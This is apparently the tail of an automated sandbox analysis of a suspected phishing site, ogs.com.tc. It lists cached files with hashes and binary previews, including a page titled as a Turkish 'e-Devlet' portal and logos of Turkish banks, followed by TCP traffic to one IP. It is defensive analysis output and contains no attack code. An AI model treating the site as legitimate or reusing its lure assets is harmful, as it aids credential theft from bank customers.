.%(.....4H.{\|.%.A...T./.le. 9*..U\|.B].......J...KE.s.....A....A..c..&..$..y.tL=.Z.Z

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:48:36], progressive, precision 8, 500x200, components 3
Category:	downloaded
Size (bytes):	52012
Entropy (8bit):	7.792087654425522
Encrypted:	false
SSDEEP:	1536:pNaNX9QYIy7Gkkc6T7owWJw9gRcb/pYJxNZb1YZnvR:pIPZklUJAHb/pIxLYnp
MD5:	2C6418346997FDB03349D4F026BED400
SHA1:	EB6FC219BB66829771C3D153FD1C042AA31B368B
SHA-256:	FCC9FE739E09A1E8C65FA63D6802FE6D87AEB4BB73B3A41EAF90426A5F5D6CC0
SHA-512:	7728D1A6EF488CC401D45F5AD636FAAB3B2B4735A37C8480F75862350E10DE751187F1EB8E22E2138959B0B56E8B8BF2FB8D176BC086A50405D1C17E86E264C7
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/ing.jpg
Preview:	......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:48:36........................................................................."............(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%0.R.-{H=...c.Hk..y..O......:_N.8N...[.f.R...X...a...O..+.J.?.a..Z..v5&.+cZ..`;...}.....$......@:.-.

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	4414
Entropy (8bit):	7.945095559581274
Encrypted:	false
SSDEEP:	96:YMZwRS+gvHuw7q1stqv9hCHvMd6c6gpilgoKwxUKr2/0C:YMGRS+gvHl7WsalDiObwuQ2Z
MD5:	D1306EE481D42E8B5C9BEDC7912750BD
SHA1:	69280F12C5A71880B049D64CCA44B99AACAF6DC3
SHA-256:	C005BB0A1E17FD46685CFFF945353975BDAC012D5F487BE9C3BFFE1C08F02FB0
SHA-512:	FD1E172442E1C782444ADF096D15BA00EB79DCEB9E994B6255EB245CEC8492A85ABD0B5D18EA5339A7A7EDAE18E06CBAAE0B79D4DC9F922574759E099698D383
Malicious:	false
Reputation:	low
Preview:	RIFF6...WEBPVP8 ....[.......>I$.F".!!"2H.P..in.wa...\}K......i;..]:........`....z.y..S.O.../\|.@....=`......~...?..........j....7d.......\.:.7........k...%...K.._........G....._..4..._.o.......?l.'...p.....~g... .o......~.~7?..C.;.3...........]._...............I.... .=R........................q.....'....3...3....._.1.....\.....:...._........p........bX<.!d.0_ sS..3..k.@....P.3p8/.....]I...v...........=_U...2..a.5...A.........B...U..{....\.hI]JD.....y..>.YKi".".:..JUV..f7.w......_E....?.Dk.......9........kz.4}.2_i...5.r<_...f.O.....+......q.Q.//...g.K+...$.f.Z..G.)....S....e.n.2...`....7..5....c....<.._.z...I?.P.T.5..."2.3..Y]..>.Y]..>.Yf"...,..i..,..i..,..i..,..i..,..i..,..i..,..i..,..i..,..i..,..i.........f.......-...'...f....G...............>k...<'.4...s.r!......>W..La.(V.....=I..0'.f...$p.]Q.....4-.._sg.+.V. .p..G(w_....%E.x.vX..O..Y.O&..%...I.R..N...e.[.......b...b1T\|...7..._.e...,..j.L.79.\|C............,..LsI...e

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	4042
Entropy (8bit):	7.944757222253673
Encrypted:	false
SSDEEP:	48:s4M0dukGQY5v9g+Ca2TWLwk75UOlI6QEpWgDDwrYhwxf8wHG8umz00og2SBtKiCL:s4MW8vKFqLqX61pm8Au2H4iCGQ
MD5:	F188C8BDEC3EF94C06AAEF6EE7381867
SHA1:	36DD9ECD9ECCE60496899DCC092508D06ADD77DD
SHA-256:	80F27648BA9BCFE1F3E29EAA9EA2B0C87C815CAFAA0D708042D0EE926E295B14
SHA-512:	9EFD2C067F15AC9A8C543D8D056655CB5EC18A79F72CF1F7320A0AB14077EB5828AEE2295CAD560BD62ED59205211D959540E9692F406278181FD8205DFA4073
Malicious:	false
Reputation:	low
Preview:	RIFF....WEBPVP8 .....X.......>I$.E..!...H(....p.X.....r..7{o....s......Q.........o0..^..`?_.e....~......w...u..........`...=6.t...........=......N.?t{S...~.~w.......;....._.\s ..G....T2..i.'.'.m.?..r.../._.C.Q...3.-...O..j.E.K.~}.{......../p^..{......../p^..{......../p^..{......../p^.......d....8j.$..3...~.4..}....".B.....9..tdQ.<.7.F.9.v+Z^..O.9...M=.JqW..!w...]...t.N..}..h\..>MN....h.c.oA....5s......^..=3...#...x.l6..."a?..!~.'.W.{...<..c.v...r%m..cq~..c^... .......Os....nR.'..h.6..;........{.T...wC....J.i2.N.8`..J......y.v........!...u.N0(..MHF..x.7.N .Uw.<!...`!.....[0x.h..@+V"......0xg%z........A. .<.x...q........DCw..]>.9W..p^..{......../p^..{......../p^..{......../p^..{........).............B}.....?\|.....:.....r]N#AP.G....\|.^.z...F.......y.....u..lqj.M'.$..:...d.M.\|.VXv.a1..v. M.-.b...)..h1...5.I.p.....6.L..g.t..Q.f....Q!L.$......n...W.IH.........6b.B......q.a.].R.....J4.....u1P.D...F\..P...."s.%c..`........n...:........]2 \.

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1572)
Category:	downloaded
Size (bytes):	69978
Entropy (8bit):	5.364990117993356
Encrypted:	false
SSDEEP:	384:+NOQ/5tqaZBq99CnbpgOFuGtFjZoq997nO23Oex/tkQZXq99Qn1r6ODoct3JZmq0:0v/BzfrVfvPpwc8UUMK
MD5:	E0E57F14B7C1DBDDD5AD278D0B1CAEBB
SHA1:	CBC83166BE6D1535D2191CF72CF36C8CC72920A0
SHA-256:	0DCF73B3AE74451091DF71905883CC4E32D18AB16C3B36D552FC79BDDEC1BE1C
SHA-512:	C295E7D5B433BE78741EA5B8CB605EDBD3CEB79B89B0888CA9689005BF6A5F43E48F8818FFAB93426440398DBB34A297626D06F0F6820B7BF2EA3EB22CFA99FD
Malicious:	false
Reputation:	low
URL:	"https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&display=swap"
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Open Sans';. font-style: italic;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtE6F15M.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Open Sans';. font-style: italic;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWvU6F15M.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: italic;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtU6F15M.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}

Chrome Cache Entry: 90

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (571)
Category:	downloaded
Size (bytes):	10068
Entropy (8bit):	4.597224404478738
Encrypted:	false
SSDEEP:	192:cl5Ryqo9J7oT6mEY2JQPRjSJQPMJQPR3SwXRMLZJQ+kB:RY7SwuBe
MD5:	20A9E2A223ED126215AEEEE59F03C375
SHA1:	66B4A73845E187910D7C9058F2CDD4D8F8254B2B
SHA-256:	ADD940A86AA9563753AF3FDEFB4B3D8394068FBC6CB1C9B972D5FEF41E834420
SHA-512:	1991A51B9E0FE510CE311852D506464E638D47B296354CEB00A4BD7170C255B4075DF92563FC8B76BB9EFDE3EA3600E82E08EB5C7AE6ED83F7A7E4E52EC819DB
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/
Preview:	<!DOCTYPE html>.<html lang="tr">.<head>. <meta charset="UTF-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>M..teri Portal. \| e-Devlet</title>. <link rel="stylesheet" href="assets/css/style.css">. <link rel="shortcut icon" href="assets/images/favicon-196x196.png" type="image/x-icon">. <style>. @media(max-width:768px) {. #basis main .methodSelector {. height: unset;. padding: unset;. }. .richText {. gap: 20px;. width: 100%;. display: grid;. grid-template-columns: repeat(2, 1fr);. justify-items: center;. }. .richText .box {. width: 100%;. }. . }. #basis main .referrerApp {. display: flex;. align-items: center;. flex-direction:

Chrome Cache Entry: 91

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 165 x 40, 8-bit colormap, interlaced
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	7.8303895814946145
Encrypted:	false
SSDEEP:	48:3YniT3/OGVBWNNr5Ko9HRoOcqAfuvQubCdcjYEvvcl8J4D8DbSEz:j2GfWNNpmq6uYcFnc+WDo
MD5:	FDAC5F9234036C2502CEE52C30F7774B
SHA1:	CD24A9F757055E2EF598BE0D164934C6A1B4E3CD
SHA-256:	473F0D637169B8B400874FFB0C487DFC5F4BC544E8BFEBE98502A6A5CEB781E7
SHA-512:	6353199AB3414FE3D72BF07359D54B3D74D9B02153F0495D38E99EC3BD5BDAB3415425C0BDA4612388409194948D9E1E137D6F7FD5E76497ACC698AD22237C6D
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.......(........x....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.................xy.oo.ij.de...........ef.....................ML.(".SS.\|}.TT..........0,.$...........VW.JJ......)....HH.....52....QR.75.....&......%..uu.......3/.......{\|.......ff..........................rr..?=...................B@.YY....,'.~........2...........`a....+&.......:8.FF.......DD.......[[.y{....;9....]^....kl.......z{....(!.=;........................d..\....bKGD....H....tIME.......:.+.....IDATX..Xi[.I..@...D.#.W&.....D0.A ....4.gb...o..^......CwuOMQ.U]]=D..N.W9.~}h..'.D..:.<uQ.p.4.%.A.G.k...D...<.\|....fck.J@Ty.\|.f..B. .I5..(...[...47Q.....1..bUk.Z.z].......s5\|^....o..9N...+V...6,..\.0Do..Y..@n{...#.qiN3..!*(...[@r.3x..../.M....Wc....a}..Y..c....X=.....].qo.,p.....8.).M..]1......\......q.....(Ay........B8PB.%...P?B....."...#.Y.S`.\|.=..]..0Y.F..n.`......r.v...,<..&.`6j.@..B. /.K...c..=l..4.....Kr.l....z...L.}....m...N.q.&..@..^...L.E

Chrome Cache Entry: 92

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 18:05:41], progressive, precision 8, 500x200, components 3
Category:	downloaded
Size (bytes):	30853
Entropy (8bit):	7.553405232630665
Encrypted:	false
SSDEEP:	384:nX0d/iZ2X0un/SUveaq0A9O9R6QpxPETLFZitbM/0UQv/acp1sQoh0eY/aUjCRaJ:X0d/J0u8adL9Rpx88twMV/fVjC4
MD5:	086FF182D1CE8900789C915F40274FBA
SHA1:	8B3A467A19D3B3E1B014646B4D720570A44A129B
SHA-256:	CFE6B1FDC9E2AB8BBDA89190E3305A86866196D1B60BB3B3849D47CD5C89A3C6
SHA-512:	975293F2F2FE33D4A0E2CA64CB49078C057D692B021B8912792BDF841606323A3A2296F2F862DEE7BEE7BA836E808861A0DF23E34B62B80990E300504B72897A
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/sekerbank.jpg
Preview:	.....oExif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 18:05:41........................................................................."............(.....................2...........5.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)...m.6../y.h.......$..........-...qc.q}.........M.$Vd..l.._3..}...q.m....4.......f^e..z.6X.....

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	4528
Entropy (8bit):	7.936942161113379
Encrypted:	false
SSDEEP:	96:eM0ww3WpqYkXJnPUlwdFKoN8FSz2gDi/8:eM0l3Wp7oJPgwdFdNeSzZDj
MD5:	7D37026130C2A0B269BD4F9C165FAD7F
SHA1:	F53514C0D1A2F644CB6DB4FFADF0167FEC4413BF
SHA-256:	008B64ADB48FE137B0210B3187450B8804FB291D5283E794E2EAE52E05D61720
SHA-512:	C8FA453082068ED27DFEFA878997B30D8420FD053C5F3616A36DC6B2824493D403662F92EFD64248E1F10F58225E41EEE60A420C6C6D40E3814DC800F16E55AA
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/turkiyefinans.jpg
Preview:	RIFF....WEBPVP8 ....0^.......>I$.E..!...T(....p.T...y.U..~!.s....,.o..k>..@y.~..u...........7..P....z.=.?h=3.d~..l.......d....C.?..t~..[..LP~;.....f.#>..c.../.....w................o.>...{..(.g.c.w.o./........g.3....\.........+.............../.k.s..P....w.....w.....w.....w.....w.....w.....w.....w..e..5.r...;..r...;}.bo.>S........~.....F..p.I...;AT....+.M"Gz..uG..7W.n3..T.G1.....2..D.G..PI\.,..](./.!..z.T..D.....3.@....obLH\o....9..l.]b...#..e.}.S....2K..?c..........=ey.U.E.!._7u.....9D..eZ..'.:..\.6iE.^..m?T.......,..D..2=....%V.K....~...5.`....52..D<l...#..2...d.N..8.n.F....\..%..=.'.O~5.D..!.....R.......U.....N....I...QjCV..`..._.1..IOb.yg~....F..Q.:..wJ....%....Uy..0..w...!...@wf....;..r...;..r...;..r...;..r...;..r...;..r...;p...............$.e....q..5O..M.nf.Ap."..8....l...7.....1....c..[...A4FD,.+.f..(....Of.Oj...&Y....5....{.^...)...i.<.F...r.A....y..%(.....4H.{\|.%.A...T./.le. 9*..U\|.B].......J...KE.s.....A....A..c..&..$..y.tL=.Z.Z

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	4050
Entropy (8bit):	7.9449549923866
Encrypted:	false
SSDEEP:	96:I6zgu0J3Vwy7fD47SdIsVr4EEAzvpUg2yUR6g9qQV2kHEVdisb:IOg5D9k/S5dlURL92Fmsb
MD5:	C9D61E6409128B3B695DA5D0F577709D
SHA1:	DF9F6B72F626A34E1A0F7C5E09198616CD055DC6
SHA-256:	4C353EB3748F302E18D210A9AB7CC1BA7E1B28A7357E038782E4E7A88088547A
SHA-512:	4587B9784B632CDC4AF5427F7E6B735957BF1EF06FDC0B40F6ED3CD45F57E047A07C168072211A835272C703EB6AD4B841A49CB311B2B7B74DEB44A1B409D07D
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/kuveyt.jpg
Preview:	RIFF....WEBPVP8 .....U.......>I$.F".!.!...P..en.v....}...~Z{U?..........<..K..._.?(...n......O...G.....<..9.....w......q.................[...;.....o.o.o....._.?.~...u..k..j?..$..\|..g0'......a...Ey......@.....}..8.+.w.....~5.B...o.....c..-.O.....0...w..h_..f/.`.\Z..`9.e......0..2..Nmv..n.\|..6.yL.7..AS.]....._ ...S.../.P.7g.0 %.........D5.sp...9...`9.........,f....7....(.G..6.q...&..."!...........H..0.u,X.Y$..U.....<dy. .ZR.E\|5..=..g......L.6....D'#.!..P.R~..B....M.x...[M.#....-B...:..7...W..@.hm>N...zW.~.@.PT3.Y........&.. ... D..p...'....{...\|.[,.n..6.%..k..D.H........<&....a.N.Z..#T....3......2sC......./".S.C.C...%AS.]....._ ...S.../.T..o)....sk...sp...9...`9.e......0..2............a..?......1.P...I=N....4...N...........J..h.....V..~.,.0...GD.i.......R.a.."..>..p2...O^S...........@.l.W..sC..O.X.Qh....I..0..b&...jS{.LA.\|/G......w.t8.....O..Y9c..C.!7....b1\|%9r.2*:..p...rxK.^V.t._0.....p.R._..............i$..K.p....2..[_..l....)..A)r.Vq

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:27 19:59:58], progressive, precision 8, 500x200, components 3
Category:	downloaded
Size (bytes):	22502
Entropy (8bit):	7.2894603929109865
Encrypted:	false
SSDEEP:	384:v9/ioaLnh1bF8ICY2MkvRkiMbF4/EMnTMY7LTat:v9/SLDGICY2rvkhObr7K
MD5:	AC0CD030D45D9E6E66C084BDE8E550BC
SHA1:	DDCD46644E2F43B14A8D399106F697631A138B2C
SHA-256:	42AC0A069FB6314753F1FDD80C94DAEEB7E784FBC34661CA692C7885390A86B9
SHA-512:	0926E006155988284696401B05F217E961474F125D560E654E6687B2D2CC48FB5306992143EB94D5836FE495FBA0EB07FAE1375652DAE028F240173C9B886C29
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/teb.jpg
Preview:	.....SExif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:27 19:59:58........................................................................."............(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$....I.7.}.no...R.&.....3.J]$.IJI$.R.I$...I%)$.IO...T.I%)$.IJ\...[u..........2\....'...................E...........T.......-.....n...

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:19:10], progressive, precision 8, 500x200, components 3
Category:	dropped
Size (bytes):	46102
Entropy (8bit):	7.754632398541905
Encrypted:	false
SSDEEP:	768:AXle3/a8XlekUl9YkExyc2wnBGsNKgiaCZXqgTnfjB3gZWr5TN/M6TJ6Ud6bPC:AXleC8XlekK9cxPBGsNKJdZ9Tn93GWr/
MD5:	6CFFC318B97A4D585F3B967257F7E3B1
SHA1:	6B3B875B2D43D05C90DD5F1DF832473B1B369D42
SHA-256:	F420DA08280CB364B9DD6EF4C6404923854A0E449DEAA93F7A97044BED52B463
SHA-512:	C37D0F4267773271D747A78A26D1D00C6ABFEB2AF3C08409925432C492B91DB7827AC48EA7B11125FCE66CC248EFB858A18F11FD8F8F1204C78E53B32C837E0B
Malicious:	false
Reputation:	low
Preview:	......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:19:10........................................................................."............(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%9.Yz..../....0.gY.........\....\.....pz..}....^n......7../}^....D...O3#......*\2..5...Ml.....o..}...

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:28 03:31:15], progressive, precision 8, 500x200, components 3
Category:	dropped
Size (bytes):	36954
Entropy (8bit):	7.6584790869372155
Encrypted:	false
SSDEEP:	768:zcoO/xcoGHVKZnU+ytlJjIWlBc86nXHgGbikavTDupeJMKK:zcoUcoGHw1/y3lLLCgGuhDTMJ
MD5:	55EAC6447192DC06174FFD6FC925B12C
SHA1:	EB34EA301401FDAAE5C50D52E2F11934738E98F5
SHA-256:	652F9B7EF8CD5A0C66CB112CE2B7EB8EA7F9332D13552C7E82E9C7E5F532E075
SHA-512:	54A0E0B2D0A1AC3F154DDBFFCBE366C0EA38A0BB6E2F84CC7EE30B2248DBDF0039C7C43B5D88DBA5C8F7A15EE8D986D25F74BDCE0B275B0C815EA5357DE825BD
Malicious:	false
Reputation:	low
Preview:	.....{Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:28 03:31:15........................................................................."............(.....................2...........A.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)ef}`.....i...........[.........P....rG."..*...g.d....1M...N.N..s.$.9.e..pi<....=[1.......v2.6.....

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 20:19:27], progressive, precision 8, 500x200, components 3
Category:	downloaded
Size (bytes):	36270
Entropy (8bit):	7.647087471913715
Encrypted:	false
SSDEEP:	768:dDL/CDMGJ4x2yom4g9v4aWZYZDPnNrCmgZH6AtBF:di4GJfdNgNpWZYXrFgZ7
MD5:	DFF21D4248FC2A0B6B34A0D108B9121A
SHA1:	E52B06B2F5C7379AE46751B399A10E53425C02D4
SHA-256:	599A24CF29AB06D972A5C2E4386F21051D3B78B27F93B9306EB3FFCC71263B94
SHA-512:	132754CF24C1485608CB61747782B680D8C0DA34DDCDB5229DEC03CE7B647B82840B76D768BFD7BE3BD73C7A8B2B91604851C78A890AE748D13487B1133A8BEC
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/albaraka.jpg
Preview:	......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 20:19:27........................................................................."............(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.@.........\bO.G.s......Vm..6C_i..8......).$..L.$v.>..W.Y.L.$b7....f.I$..I$.J....T.I%)$.IJIQ..k..;r)..m.a.fCZ...^......

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:48:36], progressive, precision 8, 500x200, components 3
Category:	dropped
Size (bytes):	52012
Entropy (8bit):	7.792087654425522
Encrypted:	false
SSDEEP:	1536:pNaNX9QYIy7Gkkc6T7owWJw9gRcb/pYJxNZb1YZnvR:pIPZklUJAHb/pIxLYnp
MD5:	2C6418346997FDB03349D4F026BED400
SHA1:	EB6FC219BB66829771C3D153FD1C042AA31B368B
SHA-256:	FCC9FE739E09A1E8C65FA63D6802FE6D87AEB4BB73B3A41EAF90426A5F5D6CC0
SHA-512:	7728D1A6EF488CC401D45F5AD636FAAB3B2B4735A37C8480F75862350E10DE751187F1EB8E22E2138959B0B56E8B8BF2FB8D176BC086A50405D1C17E86E264C7
Malicious:	false
Reputation:	low
Preview:	......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:48:36........................................................................."............(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%0.R.-{H=...c.Hk..y..O......:_N.8N...[.f.R...X...a...O..+.J.?.a..Z..v5&.+cZ..`;...}.....$......@:.-.

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 26, 2024 00:16:59.808132887 CEST	49678	443	192.168.2.4	104.46.162.224
May 26, 2024 00:17:01.042490005 CEST	49675	443	192.168.2.4	173.222.162.32
May 26, 2024 00:17:10.837968111 CEST	49675	443	192.168.2.4	173.222.162.32
May 26, 2024 00:17:12.402869940 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:12.402893066 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:12.402955055 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:12.403539896 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:12.403546095 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:12.403597116 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:12.403719902 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:12.403731108 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:12.403856993 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:12.403868914 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.158029079 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.158571005 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.158582926 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.159538984 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.159603119 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.162729979 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.162798882 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.163372040 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.163379908 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.166527987 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.166798115 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.166805029 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.168384075 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.168447018 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.169645071 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.169734955 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.215034962 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.215034962 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.215046883 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.260435104 CEST	49738	443	192.168.2.4	185.216.70.93
